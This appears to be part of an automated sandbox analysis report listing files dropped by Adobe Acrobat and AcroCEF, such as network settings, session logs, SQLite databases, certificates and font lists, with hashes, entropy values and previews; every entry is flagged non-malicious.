                                      Preview:{"net":{"http_server_properties":{"servers":[{"isolation":[],"server":"https://armmf.adobe.com","supports_spdy":true},{"alternative_service":[{"advertised_alpns":["h3"],"expiration":"13380623781459747","port":443,"protocol_str":"quic"}],"isolation":[],"network_stats":{"srtt":170315},"server":"https://chrome.cloudflare-dns.com","supports_spdy":true}],"supports_quic":{"address":"192.168.2.9","used_quic":true},"version":5},"network_qualities":{"CAESABiAgICA+P////8B":"4G"}}}
                                      Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                      File Type:JSON data
                                      Category:dropped
                                      Size (bytes):475
                                      Entropy (8bit):4.975824910517686
                                      Encrypted:false
                                      SSDEEP:12:YH/um3RA8sqqDsBdOg2HYqAAcaq3QYiub5P7E4T3y:Y2sRdsjEdMHYqAr3QYhbt7nby
                                      MD5:52C36B6C95AE766D19A6FFF6F80D8824
                                      SHA1:E0F6688F6A4CA0F7496886DC4663F112C0269FD5
                                      SHA-256:264242502072929B8B7E238E2405176568FA6F03EFA5A1D8E1CA31D824179689
                                      SHA-512:633093C884C3446CF188CA46BD6600CBC8C28E34A1FEA2013472BF89F8EE3CF5934AE3B3AF64446FB0B539FB7F1F43D9F7D10F98C94DF4DA85FB35F79A27121F
                                      Malicious:false
                                      Preview:{"net":{"http_server_properties":{"servers":[{"isolation":[],"server":"https://armmf.adobe.com","supports_spdy":true},{"alternative_service":[{"advertised_alpns":["h3"],"expiration":"13380623781459747","port":443,"protocol_str":"quic"}],"isolation":[],"network_stats":{"srtt":170315},"server":"https://chrome.cloudflare-dns.com","supports_spdy":true}],"supports_quic":{"address":"192.168.2.9","used_quic":true},"version":5},"network_qualities":{"CAESABiAgICA+P////8B":"4G"}}}
                                      Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                      File Type:data
                                      Category:dropped
                                      Size (bytes):3878
                                      Entropy (8bit):5.228376626173982
                                      Encrypted:false
                                      SSDEEP:96:GICD8SBCmPAi8j0/8qbGNSwPgGYPx8xRqhm068OzeDj2k5:1CDLCmPj8j0/8qKgwPHYPx8xemT8Ozen
                                      MD5:87AF6D199E2934215BABDBE62F4C69B9
                                      SHA1:9E14BE79A9562CEC422CEF5CE24BC461E84CABE7
                                      SHA-256:D2B12894475E93351F14562BA7D8DB81080B18C3702133A757DB22730056F9E7
                                      SHA-512:6834ACFEE9076B04C1235C70348E02C3899362D8B9BFAF372A391E4980C359B72A626A252D2EE2EA7B95CCBA18185E600A07B24D79203C423C8FDB974A75A047
                                      Malicious:false
                                      Preview:*...#................version.1..namespace-W...o................next-map-id.1.Pnamespace-ed11ed50_1515_4296_b27c_721e1e1acdec-https://rna-resource.acrobat.com/.0.w..r................next-map-id.2.Snamespace-f62cae74_b031_4dd2_8c7b_e9ef3858dbf9-https://rna-v2-resource.acrobat.com/.1:M4.r................next-map-id.3.Snamespace-2a2b5482_c0ce_4c74_9fbc_8a8daf6ed72d-https://rna-v2-resource.acrobat.com/.2IE..o................next-map-id.4.Pnamespace-b58dfce7_364b_43da_946b_3d7546a793e5-https://rna-resource.acrobat.com/.3KQ..^...............Pnamespace-ed11ed50_1515_4296_b27c_721e1e1acdec-https://rna-resource.acrobat.com/.xK.^...............Pnamespace-b58dfce7_364b_43da_946b_3d7546a793e5-https://rna-resource.acrobat.com/.i.+a...............Snamespace-f62cae74_b031_4dd2_8c7b_e9ef3858dbf9-https://rna-v2-resource.acrobat.com/Tz.qa...............Snamespace-2a2b5482_c0ce_4c74_9fbc_8a8daf6ed72d-https://rna-v2-resource.acrobat.com/"_.o................next-map-id.5.Pnamespace-7c898a99_566e_4628_b4ec_
                                      Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                      File Type:ASCII text
                                      Category:dropped
                                      Size (bytes):322
                                      Entropy (8bit):5.098356187495212
                                      Encrypted:false
                                      SSDEEP:6:iOHbuU94q2PqLTwi2nKuAl9OmbzNMxIFUttbwHdJZmwDbI0DkwOqLTwi2nKuAl9c:77qv8wZHAa8jFUtFwHn//Iq5TwZHAa8E
                                      MD5:510D3E319C176646BB237C9D4B6A738A
                                      SHA1:12301A2C674E92E32036F2E11F2FFB14303F1C37
                                      SHA-256:42A2E56D3D52A35010D7A461C75C0A615EEFDF1A74F68509359DD9D03F9890D5
                                      SHA-512:8ADE5EB911C856BBA8A2EC45583027DC42DE4BAB29D091930D840AE66D7BA38A844D72604C43DBECBD13C85DE0D3B1EEAE36350FBFB753E3CED0B7E3DA47D813
                                      Malicious:false
                                      Preview:2025/01/05-02:56:10.005 1b80 Reusing MANIFEST C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Session Storage/MANIFEST-000001.2025/01/05-02:56:10.006 1b80 Recovering log #3.2025/01/05-02:56:10.007 1b80 Reusing old log C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Session Storage/000003.log .
                                      Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                      File Type:ASCII text
                                      Category:dropped
                                      Size (bytes):322
                                      Entropy (8bit):5.098356187495212
                                      Encrypted:false
                                      SSDEEP:6:iOHbuU94q2PqLTwi2nKuAl9OmbzNMxIFUttbwHdJZmwDbI0DkwOqLTwi2nKuAl9c:77qv8wZHAa8jFUtFwHn//Iq5TwZHAa8E
                                      MD5:510D3E319C176646BB237C9D4B6A738A
                                      SHA1:12301A2C674E92E32036F2E11F2FFB14303F1C37
                                      SHA-256:42A2E56D3D52A35010D7A461C75C0A615EEFDF1A74F68509359DD9D03F9890D5
                                      SHA-512:8ADE5EB911C856BBA8A2EC45583027DC42DE4BAB29D091930D840AE66D7BA38A844D72604C43DBECBD13C85DE0D3B1EEAE36350FBFB753E3CED0B7E3DA47D813
                                      Malicious:false
                                      Preview:2025/01/05-02:56:10.005 1b80 Reusing MANIFEST C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Session Storage/MANIFEST-000001.2025/01/05-02:56:10.006 1b80 Recovering log #3.2025/01/05-02:56:10.007 1b80 Reusing old log C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Session Storage/000003.log .
                                      Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                      File Type:PC bitmap, Windows 3.x format, 110 x -152 x 32, cbSize 66934, bits offset 54
                                      Category:dropped
                                      Size (bytes):66934
                                      Entropy (8bit):1.7544134515160215
                                      Encrypted:false
                                      SSDEEP:192:8iRvM0C0BLs5q/z4molmRy8OazjL+ZdTkdAw888888H+88838Sak888888H+888x:8iRLfG2gazjL+3TkdApSsWkvXQV
                                      MD5:A61E2E877B9BEBF90983EE1455F6C731
                                      SHA1:C0C641D144A7D5BA73C505EBE6EA34D92EF2335F
                                      SHA-256:FB3D9E842D9E3703AEE31D85DB37A454460C35575955661DF1961DAE53089D44
                                      SHA-512:B3B9B8924D74208FD40AE031886AA4C87158CCE498B5FCC0925C87E7D42543A9B7E0560229319A024424B3D73D5723E631113D310DE09CF0D28E68966044B1C1
                                      Malicious:false
                                      Preview:BMv.......6...(...n...h..... ...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                      Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                      File Type:SQLite 3.x database, last written using SQLite version 3040000, file counter 13, database pages 21, cookie 0x5, schema 4, UTF-8, version-valid-for 13
                                      Category:dropped
                                      Size (bytes):86016
                                      Entropy (8bit):4.438444925180195
                                      Encrypted:false
                                      SSDEEP:384:SeYci5GliBA7vEmzKNURFXoD1NC1SK0gkzPlrFzqFK/WY+lUTTcKqZ5bEmzVz:fpurVgazUpUTTGt
                                      MD5:1EECE1348E2A870DEF87C03F9F3953AE
                                      SHA1:6E0E9315A192569B7C096AD087A4FBC14F707245
                                      SHA-256:4C16E92C28F460A37F8F755D8358A3A6C3DDA1A6302619581543253872A87201
                                      SHA-512:E678754E567BD4B74058EC52DF27EC2AEF1A6BDF6BF6E452425FFDCDBBE7CA5124A3819A3ED5AC69A434EA4D3750D4E5F269C880261C38BED602983AFE06C258
                                      Malicious:false
                                      Preview:SQLite format 3......@ ..........................................................................c.......1........T...U.1.D............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                      Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                      File Type:SQLite Rollback Journal
                                      Category:dropped
                                      Size (bytes):8720
                                      Entropy (8bit):2.213720778721636
                                      Encrypted:false
                                      SSDEEP:24:7+t1X6wKmfqLLzkrFsgIFsxX3pALXmnHpkDGjmcxBSkomXk+2m9RFTsyg+wmf9Mo:7MpWKqPmFTIF3XmHjBoGGR+jMz+Lh5
                                      MD5:513E008501BA6DA7EBF5586BFD120F3D
                                      SHA1:847868533AE8479049BE6B29913A5904C9838FF7
                                      SHA-256:5095444AC1FB8CC67B9EDF57ABAC8ADF7FA04C4A6CF97713C6C209B9BCC5A216
                                      SHA-512:02B3D1034ED8B0187E4B4E96FEB84A834B5100E084FEEBB61EFDAA4EB395D9016D422FBD81A2EFE73ED5F5C0113B132D9E997083AF0594DB05898A4B0ABC72E9
                                      Malicious:false
                                      Preview:.... .c......M..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                      Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                      File Type:Certificate, Version=3
                                      Category:dropped
                                      Size (bytes):1391
                                      Entropy (8bit):7.705940075877404
                                      Encrypted:false
                                      SSDEEP:24:ooVdTH2NMU+I3E0Ulcrgdaf3sWrATrnkC4EmCUkmGMkfQo1fSZotWzD1:ooVguI3Kcx8WIzNeCUkJMmSuMX1
                                      MD5:0CD2F9E0DA1773E9ED864DA5E370E74E
                                      SHA1:CABD2A79A1076A31F21D253635CB039D4329A5E8
                                      SHA-256:96BCEC06264976F37460779ACF28C5A7CFE8A3C0AAE11A8FFCEE05C0BDDF08C6
                                      SHA-512:3B40F27E828323F5B91F8909883A78A21C86551761F27B38029FAAEC14AF5B7AA96FB9F9CC93EE201B5EB1D0FEF17B290747E8B839D2E49A8F36C5EBF3C7C910
                                      Malicious:false
                                      Preview:0..k0..S............@.YDc.c...0...*.H........0O1.0...U....US1)0'..U... Internet Security Research Group1.0...U....ISRG Root X10...150604110438Z..350604110438Z0O1.0...U....US1)0'..U... Internet Security Research Group1.0...U....ISRG Root X10.."0...*.H.............0..........$s..7.+W(.....8..n<.W.x.u...jn..O(..h.lD...c...k....1.!~.3<.H..y.....!.K...qiJffl.~<p..)"......K...~....G.|.H#S.8.O.o...IW..t../.8.{.p!.u.0<.....c...O..K~.....w...{J.L.%.p..)..S$........J.?..aQ.....cq...o[...\4ylv.;.by.../&.....................6....7..6u...r......I.....*.A..v........5/(.l....dwnG7..Y^h..r...A)>Y>.&.$...Z.L@.F....:Qn.;.}r...xY.>Qx....../..>{J.Ks......P.|C.t..t.....0.[q6....00\H..;..}`...).........A.......|.;F.H*..v.v..j.=...8.d..+..(.....B.".'].y...p..N..:..'Qn..d.3CO......B0@0...U...........0...U.......0....0...U......y.Y.{....s.....X..n0...*.H.............U.X....P.....i ')..au\.n...i/..VK..s.Y.!.~.Lq...`.9....!V..P.Y...Y.............b.E.f..|o..;.....'...}~.."......
                                      Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                      File Type:Microsoft Cabinet archive data, Windows 2000/XP setup, 71954 bytes, 1 file, at 0x2c +A "authroot.stl", number 1, 6 datablocks, 0x1 compression
                                      Category:dropped
                                      Size (bytes):71954
                                      Entropy (8bit):7.996617769952133
                                      Encrypted:true
                                      SSDEEP:1536:gc257bHnClJ3v5mnAQEBP+bfnW8Ctl8G1G4eu76NWDdB34w18R5cBWcJAm68+Q:gp2ld5jPqW8LgeulxB3fgcEfDQ
                                      MD5:49AEBF8CBD62D92AC215B2923FB1B9F5
                                      SHA1:1723BE06719828DDA65AD804298D0431F6AFF976
                                      SHA-256:B33EFCB95235B98B48508E019AFA4B7655E80CF071DEFABD8B2123FC8B29307F
                                      SHA-512:BF86116B015FB56709516D686E168E7C9C68365136231CC51D0B6542AE95323A71D2C7ACEC84AAD7DCECC2E410843F6D82A0A6D51B9ACFC721A9C84FDD877B5B
                                      Malicious:false
                                      Preview:MSCF............,...................I..................XaK .authroot.stl.[.i..6..CK..<Tk......4.cl!Kg..E..*Y.f_..".$mR"$.J.E.KB."..rKv.."{.g....3.W.....c..9.s...=....y6#..x..........D......\(.#.s.!.A.......cd.c........+^.ov...n.....3BL..0.......BPUR&.X..02.q...R...J.....w.....b.vy>....-.&..(..oe."."...J9...0U.6J..|U..S.....M.F8g...=.......p...........l.?3.J.x.G.Ep..$g..tj......)v]9(:.)W.8.Op.1Q..:.nPd........7.7..M].V F..g.....12..!7(...B.......h.RZ.......l.<.....6..Z^.`p?... .p.Gp.#.'.X..........|!.8.....".m.49r?.I...g...8.v.....a``.g.R4.i...J8q....NFW,E.6Y....!.o5%.Y.....R..<..S9....r....WO...(.....F..Q=*....-..7d..O(....-..+k.........K..........{Q....Z..j._.E...QZ.~.\.^......N.9.k..O.}dD.b1r...[}/....T..E..G..c.|.c.&>?..^t. ..;..X.d.E.0G....[Q.*,*......#.Dp..L.o|#syc.J............}G-.ou6.=52..XWi=...m.....^u......c..fc?&pR7S5....I...j.G........j.j..Tc.El.....B.pQ.,Bp....j...9g.. >..s..m#.Nb.o_u.M.V...........\#...v..Mo\sF..s....Y...
                                      Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                      File Type:data
                                      Category:dropped
                                      Size (bytes):192
                                      Entropy (8bit):2.756901573172974
                                      Encrypted:false
                                      SSDEEP:3:kkFklQCTzXfllXlE/HT8k/7vNNX8RolJuRdxLlGB9lQRYwpDdt:kKJ+sT8I7VNMa8RdWBwRd
                                      MD5:CD0516BC1A59C4B57FCED6B550897F1E
                                      SHA1:6539BDBC837286E8AB5791D8A593AFB601C5EC3C
                                      SHA-256:B646E90EE050DDCE4AAD269037942E3649A9406A2C7E946F7F44830F322A299D
                                      SHA-512:8B9C22E72B9396D1C87573061BDC412162F02A22779FD0A32C3ACCF59B43703E4DFB15ECAB7EF5182E4F97B2D68F6CF09AFF5165D989DE6262BE8FCF6CE79C3F
                                      Malicious:false
                                      Preview:p...... ...........LG_..(....................................................... ..........W....:...............o...h.t.t.p.:././.x.1...i...l.e.n.c.r...o.r.g./...".6.4.c.d.6.6.5.4.-.5.6.f."...
                                      Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                      File Type:data
                                      Category:modified
                                      Size (bytes):328
                                      Entropy (8bit):3.1280954022511493
                                      Encrypted:false
                                      SSDEEP:6:kKHB9UswDLL+N+SkQlPlEGYRMY9z+4KlDA3RUebT3:/wDnLNkPlE99SNxAhUe/3
                                      MD5:ED024EE3C02CAE242A132AE152EE39A7
                                      SHA1:94CB218A8AF861B79441CBE2627F8D35206D44BD
                                      SHA-256:A0990D525BFC9AE6A8434ECCAA2344EB579652B54140941177DE18E244B42B55
                                      SHA-512:81D06070F175F02B4E154CB7A8FE9CBD4785BF2120CD0C8A03AD344A5B235A40E35865A9225B532CDD958B53EAED6ABA00057545C497020DB173DEF0AB6EDA6B
                                      Malicious:false
                                      Preview:p...... ..........;_G_..(....................................................... ........G..@.......&...............h.t.t.p.:././.c.t.l.d.l...w.i.n.d.o.w.s.u.p.d.a.t.e...c.o.m./.m.s.d.o.w.n.l.o.a.d./.u.p.d.a.t.e./.v.3./.s.t.a.t.i.c./.t.r.u.s.t.e.d.r./.e.n./.a.u.t.h.r.o.o.t.s.t.l...c.a.b...".a.7.2.8.2.e.b.4.0.b.1.d.a.1.:.0."...
                                      Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                      File Type:PostScript document text
                                      Category:dropped
                                      Size (bytes):1233
                                      Entropy (8bit):5.233980037532449
                                      Encrypted:false
                                      SSDEEP:24:kk8id8HxPsMTtrid8OPgx4sMDHFidZxDWksMwEidMKRxCsMWaOtidMLgxT2sMW0l:pkxPhtgNgx4pyZxakazxCIK2gxap
                                      MD5:8BA9D8BEBA42C23A5DB405994B54903F
                                      SHA1:FC1B1646EC8A7015F492AA17ADF9712B54858361
                                      SHA-256:862DE2165B9D44422E84E25FFE267A5E1ADE23F46F04FC6F584C4943F76EB75C
                                      SHA-512:26AD41BB89AF6198515674F21B4F0F561DC9BDC91D5300C154065C57D49CCA61B4BA60E5F93FD17869BDA1123617F26CDA0EF39935A9C2805F930A3DB1956D5A
                                      Malicious:false
                                      Preview:%!Adobe-FontList 1.23.%Locale:0x809..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:Identity-H.Registry:Adobe.Ordering:Identity.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\Identity-H.FileLength:8228.FileModTime:1612212568.%EndFont..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:Identity-V.Registry:Adobe.Ordering:Identity.UseCMap:Identity-H.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\Identity-V.FileLength:2761.FileModTime:1612212568.%EndFont..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:UCS2-GBK-EUC.Registry:Adobe.Ordering:UCS2_GBK_EUC.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\UCS2-GBK-EUC.FileLength:243835.FileModTime:1612212568.%EndFont..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:UniKS-UTF16-H.Registry:Adobe.Ordering:Korea1.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\UniKS-UTF16-H.FileLength:131902.FileModTime:1612212568.%EndFont..%BeginFont.Handler:D
                                      Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                      File Type:PostScript document text
                                      Category:dropped
                                      Size (bytes):1233
                                      Entropy (8bit):5.233980037532449
                                      Encrypted:false
                                      SSDEEP:24:kk8id8HxPsMTtrid8OPgx4sMDHFidZxDWksMwEidMKRxCsMWaOtidMLgxT2sMW0l:pkxPhtgNgx4pyZxakazxCIK2gxap
                                      MD5:8BA9D8BEBA42C23A5DB405994B54903F
                                      SHA1:FC1B1646EC8A7015F492AA17ADF9712B54858361
                                      SHA-256:862DE2165B9D44422E84E25FFE267A5E1ADE23F46F04FC6F584C4943F76EB75C
                                      SHA-512:26AD41BB89AF6198515674F21B4F0F561DC9BDC91D5300C154065C57D49CCA61B4BA60E5F93FD17869BDA1123617F26CDA0EF39935A9C2805F930A3DB1956D5A
                                      Malicious:false
                                      Preview:%!Adobe-FontList 1.23.%Locale:0x809..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:Identity-H.Registry:Adobe.Ordering:Identity.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\Identity-H.FileLength:8228.FileModTime:1612212568.%EndFont..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:Identity-V.Registry:Adobe.Ordering:Identity.UseCMap:Identity-H.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\Identity-V.FileLength:2761.FileModTime:1612212568.%EndFont..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:UCS2-GBK-EUC.Registry:Adobe.Ordering:UCS2_GBK_EUC.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\UCS2-GBK-EUC.FileLength:243835.FileModTime:1612212568.%EndFont..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:UniKS-UTF16-H.Registry:Adobe.Ordering:Korea1.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\UniKS-UTF16-H.FileLength:131902.FileModTime:1612212568.%EndFont..%BeginFont.Handler:D
                                      Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                      File Type:PostScript document text
                                      Category:dropped
                                      Size (bytes):1233
                                      Entropy (8bit):5.233980037532449
                                      Encrypted:false
                                      SSDEEP:24:kk8id8HxPsMTtrid8OPgx4sMDHFidZxDWksMwEidMKRxCsMWaOtidMLgxT2sMW0l:pkxPhtgNgx4pyZxakazxCIK2gxap
                                      MD5:8BA9D8BEBA42C23A5DB405994B54903F
                                      SHA1:FC1B1646EC8A7015F492AA17ADF9712B54858361
                                      SHA-256:862DE2165B9D44422E84E25FFE267A5E1ADE23F46F04FC6F584C4943F76EB75C
                                      SHA-512:26AD41BB89AF6198515674F21B4F0F561DC9BDC91D5300C154065C57D49CCA61B4BA60E5F93FD17869BDA1123617F26CDA0EF39935A9C2805F930A3DB1956D5A
                                      Malicious:false
                                      Preview:%!Adobe-FontList 1.23.%Locale:0x809..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:Identity-H.Registry:Adobe.Ordering:Identity.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\Identity-H.FileLength:8228.FileModTime:1612212568.%EndFont..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:Identity-V.Registry:Adobe.Ordering:Identity.UseCMap:Identity-H.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\Identity-V.FileLength:2761.FileModTime:1612212568.%EndFont..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:UCS2-GBK-EUC.Registry:Adobe.Ordering:UCS2_GBK_EUC.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\UCS2-GBK-EUC.FileLength:243835.FileModTime:1612212568.%EndFont..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:UniKS-UTF16-H.Registry:Adobe.Ordering:Korea1.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\UniKS-UTF16-H.FileLength:131902.FileModTime:1612212568.%EndFont..%BeginFont.Handler:D
                                      Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                      File Type:PostScript document text
                                      Category:dropped
                                      Size (bytes):10880
                                      Entropy (8bit):5.214360287289079
                                      Encrypted:false
                                      SSDEEP:192:SgAYm4DAv6oq6oCf6ocL6oz6o46ok6o16ok6oKls6oVtfZ6ojtou6o2ti16oGwX/:SV548vvqvSvivzv4vkv1vkvKlsvVtfZp
                                      MD5:B60EE534029885BD6DECA42D1263BDC0
                                      SHA1:4E801BA6CA503BDAE7E54B7DB65BE641F7C23375
                                      SHA-256:B5F094EFF25215E6C35C46253BA4BB375BC29D055A3E90E08F66A6FDA1C35856
                                      SHA-512:52221F919AEA648B57E567947806F71922B604F90AC6C8805E5889AECB131343D905D94703EA2B4CEC9B0C1813DDA6EAE2677403F58D3B340099461BBCD355AE
                                      Malicious:false
                                      Preview:%!Adobe-FontList 1.23.%Locale:0x809..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:Identity-H.Registry:Adobe.Ordering:Identity.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\Identity-H.FileLength:8228.FileModTime:1612212568.%EndFont..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:Identity-V.Registry:Adobe.Ordering:Identity.UseCMap:Identity-H.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\Identity-V.FileLength:2761.FileModTime:1612212568.%EndFont..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:UCS2-GBK-EUC.Registry:Adobe.Ordering:UCS2_GBK_EUC.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\UCS2-GBK-EUC.FileLength:243835.FileModTime:1612212568.%EndFont..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:UniKS-UTF16-H.Registry:Adobe.Ordering:Korea1.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\UniKS-UTF16-H.FileLength:131902.FileModTime:1612212568.%EndFont..%BeginFont.Handler:D
                                      Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                      File Type:PostScript document text
                                      Category:dropped
                                      Size (bytes):10880
                                      Entropy (8bit):5.214360287289079
                                      Encrypted:false
                                      SSDEEP:192:SgAYm4DAv6oq6oCf6ocL6oz6o46ok6o16ok6oKls6oVtfZ6ojtou6o2ti16oGwX/:SV548vvqvSvivzv4vkv1vkvKlsvVtfZp
                                      MD5:B60EE534029885BD6DECA42D1263BDC0
                                      SHA1:4E801BA6CA503BDAE7E54B7DB65BE641F7C23375
                                      SHA-256:B5F094EFF25215E6C35C46253BA4BB375BC29D055A3E90E08F66A6FDA1C35856
                                      SHA-512:52221F919AEA648B57E567947806F71922B604F90AC6C8805E5889AECB131343D905D94703EA2B4CEC9B0C1813DDA6EAE2677403F58D3B340099461BBCD355AE
                                      Malicious:false
                                      Preview:%!Adobe-FontList 1.23.%Locale:0x809..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:Identity-H.Registry:Adobe.Ordering:Identity.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\Identity-H.FileLength:8228.FileModTime:1612212568.%EndFont..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:Identity-V.Registry:Adobe.Ordering:Identity.UseCMap:Identity-H.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\Identity-V.FileLength:2761.FileModTime:1612212568.%EndFont..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:UCS2-GBK-EUC.Registry:Adobe.Ordering:UCS2_GBK_EUC.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\UCS2-GBK-EUC.FileLength:243835.FileModTime:1612212568.%EndFont..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:UniKS-UTF16-H.Registry:Adobe.Ordering:Korea1.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\UniKS-UTF16-H.FileLength:131902.FileModTime:1612212568.%EndFont..%BeginFont.Handler:D
                                      Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                      File Type:JSON data
                                      Category:dropped
                                      Size (bytes):295
                                      Entropy (8bit):5.344872223726413
                                      Encrypted:false
                                      SSDEEP:6:YEQXJ2HX1SzIRfe2nmSg1c2LjcWkHvR0Y0DoAvJM3g98kUwPeUkwRe9:YvXKX12Oe2mT5LjIPIsGMbLUkee9
                                      MD5:E5CF6777A7EBE40DACF732F45A22978F
                                      SHA1:71DE385C63035911268551840BA77E3DC9FADE58
                                      SHA-256:40B32DA83AC8E7BA431E45C19460A03B47766805B996C226E752E9504EB5C3F9
                                      SHA-512:4E8BA57EE528A0E8CA6C9A9F1373B864BDEE1BCE91841414B93C56A8FBF6E0237F1A14CEDD71AF24E9D291F55A099D0825912EADB2DC1708E01DBF857F207BC9
                                      Malicious:false
                                      Preview:{"analyticsData":{"responseGUID":"eedbaeb3-d340-4286-96b0-ed7bb0271688","sophiaUUID":"8C4093EC-3A2E-41DD-AFC7-28A61CF92EFA"},"encodingScheme":true,"expirationDTS":1736239324469,"statusCode":200,"surfaceID":"ACROBAT_READER_MASTER_SURFACEID","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}
                                      Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                      File Type:JSON data
                                      Category:dropped
                                      Size (bytes):294
                                      Entropy (8bit):5.2976666726133965
                                      Encrypted:false
                                      SSDEEP:6:YEQXJ2HX1SzIRfe2nmSg1c2LjcWkHvR0Y0DoAvJfBoTfXpnrPeUkwRe9:YvXKX12Oe2mT5LjIPIsGWTfXcUkee9
                                      MD5:F38695D0C6D4686F017248C9AC0E7399
                                      SHA1:966FA62019E55D8EDED8D539A4D3F58AC6151F66
                                      SHA-256:A418EF1B8AA87486BC8DE2B9B017348F986DAFFA0313E9D41C11AD28367757B3
                                      SHA-512:CD880268AFCB911D9EC23125455EEDE254FC96A44A05C8A923130ECF2C8C9C8566B60238E75BB0237D4DD0E28D98B9B79BC3FF63E4EE74E934304A74633F783F
                                      Malicious:false
                                      Preview:{"analyticsData":{"responseGUID":"eedbaeb3-d340-4286-96b0-ed7bb0271688","sophiaUUID":"8C4093EC-3A2E-41DD-AFC7-28A61CF92EFA"},"encodingScheme":true,"expirationDTS":1736239324469,"statusCode":200,"surfaceID":"DC_FirstMile_Home_View_Surface","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}
                                      Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                      File Type:JSON data
                                      Category:dropped
                                      Size (bytes):294
                                      Entropy (8bit):5.277684389429755
                                      Encrypted:false
                                      SSDEEP:6:YEQXJ2HX1SzIRfe2nmSg1c2LjcWkHvR0Y0DoAvJfBD2G6UpnrPeUkwRe9:YvXKX12Oe2mT5LjIPIsGR22cUkee9
                                      MD5:C5320FE7B17E0EBD528D402D9825EC3E
                                      SHA1:61042F6D058175A7C5A68719EE30C0062FA9EE09
                                      SHA-256:89A606B4528C91992101D7E2046FA2F860ABF8336A0DA4E02F880803CBE99091
                                      SHA-512:EA908AE11345D00F315B8C03AA28EE63F394211EC3DA031D18F5FBDA70150051C7A0AA2F2D3A3A467647C4301A559E92A431AEDD636F244E611D466D3FE82CFE
                                      Malicious:false
